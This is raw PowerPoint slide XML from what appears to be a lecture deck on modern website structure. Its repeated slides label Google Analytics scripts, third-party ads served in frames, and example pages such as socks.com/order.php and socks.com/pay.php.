          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7416800" y="4648200"/>
            <a:ext cx="314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700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B648DCB4-3727-244F-A51B-9BDD7DDEC358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="2159000"/>
            <a:ext cx="7470775" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" u="heavy" spc="15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>socks.com/order.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" u="heavy" spc="254" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" u="heavy" spc="15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>socks.com/pay.php</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D98B059-712C-524E-B7D5-7E3005A964C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5816600" y="5651500"/>
            <a:ext cx="2252663" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Separate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="26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A8F623B-8DBF-EE4E-AC6F-A82F84253C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854325" y="1244600"/>
            <a:ext cx="4348163" cy="831850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="7307" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5353" b="1" spc="-528" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Modern</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5353" b="1" spc="-425" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5353" b="1" spc="-523" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Website</a:t>
            </a:r>
            <a:endParaRPr sz="5353">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9C25E-EEA9-194D-9963-2736848E2C82}"/>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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90232E9-B7CD-BA4D-B629-51E1894FD310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043113" y="2657475"/>
            <a:ext cx="5972175" cy="363538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="161710" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2224" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1273"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="38" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analytics </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(served </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google)</a:t>
            </a:r>
            <a:endParaRPr sz="1301">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956802C-7AE0-504F-8DB1-DD221C03770A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854325" y="1244600"/>
            <a:ext cx="4348163" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Modern</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-425" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-523" dirty="0"/>
              <a:t>Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123907" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B865ADF0-9B68-124E-B352-C4FC985B30CB}"/>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23908" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31C2C1DE-E50D-1944-80E4-EDCCB9B64D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="425450" y="2506663"/>
            <a:ext cx="1176338" cy="4176712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2350770"/>
              <a:gd name="T1" fmla="*/ 0 h 8348980"/>
              <a:gd name="T2" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T3" fmla="*/ 0 h 8348980"/>
              <a:gd name="T4" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T5" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T6" fmla="*/ 0 w 2350770"/>
              <a:gd name="T7" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T8" fmla="*/ 0 w 2350770"/>
              <a:gd name="T9" fmla="*/ 0 h 8348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0770" h="8348980">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2350678" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350678" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EE220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3909" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5645B89A-9578-9D40-8173-570672D18F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617538" y="4178300"/>
            <a:ext cx="79533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542"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lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ad served  from third  party  provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF263AE-0B54-2741-9DF5-B68998B33E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043113" y="2657475"/>
            <a:ext cx="5972175" cy="363538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="161710" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2224" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1273"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="38" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analytics </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(served </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google)</a:t>
            </a:r>
            <a:endParaRPr sz="1301">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ABB6901-C2D7-5445-8051-05EEA1CC5EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854325" y="1244600"/>
            <a:ext cx="4348163" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Modern</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-425" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-523" dirty="0"/>
              <a:t>Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124931" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D05CDB11-3DB0-3147-AA77-DB1481A3388E}"/>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24932" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8D75E1-88A4-F74C-BF41-6B47FFC1F187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="425450" y="2506663"/>
            <a:ext cx="1176338" cy="4176712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2350770"/>
              <a:gd name="T1" fmla="*/ 0 h 8348980"/>
              <a:gd name="T2" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T3" fmla="*/ 0 h 8348980"/>
              <a:gd name="T4" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T5" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T6" fmla="*/ 0 w 2350770"/>
              <a:gd name="T7" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T8" fmla="*/ 0 w 2350770"/>
              <a:gd name="T9" fmla="*/ 0 h 8348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0770" h="8348980">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2350678" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350678" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EE220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4933" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A077578D-D618-CB45-984D-0A127694DF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617538" y="4178300"/>
            <a:ext cx="79533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542"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lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ad served  from third  party  provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C02BA46-6154-2649-A9BB-74DD6D23FE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043113" y="2657475"/>
            <a:ext cx="5972175" cy="363538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="161710" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2224" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1273"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="38" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analytics </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(served </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google)</a:t>
            </a:r>
            <a:endParaRPr sz="1301">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D80210CA-7D65-5D4F-81B8-E63E1723E698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2246313" y="4267200"/>
            <a:ext cx="5745162" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="1551">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3495" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1128"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="48" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ad </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr sz="1301">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BEAD804-925F-9E40-92C5-548FD5483C49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854325" y="1244600"/>
            <a:ext cx="4348163" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Modern</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-425" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-523" dirty="0"/>
              <a:t>Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{217EE274-BCF8-384A-B984-24C84619F340}"/>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25956" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6D6866-14E9-5042-B527-D00D7AB8BF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="425450" y="2506663"/>
            <a:ext cx="1176338" cy="4176712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2350770"/>
              <a:gd name="T1" fmla="*/ 0 h 8348980"/>
              <a:gd name="T2" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T3" fmla="*/ 0 h 8348980"/>
              <a:gd name="T4" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T5" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T6" fmla="*/ 0 w 2350770"/>
              <a:gd name="T7" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T8" fmla="*/ 0 w 2350770"/>
              <a:gd name="T9" fmla="*/ 0 h 8348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0770" h="8348980">
                <a:moveTo>
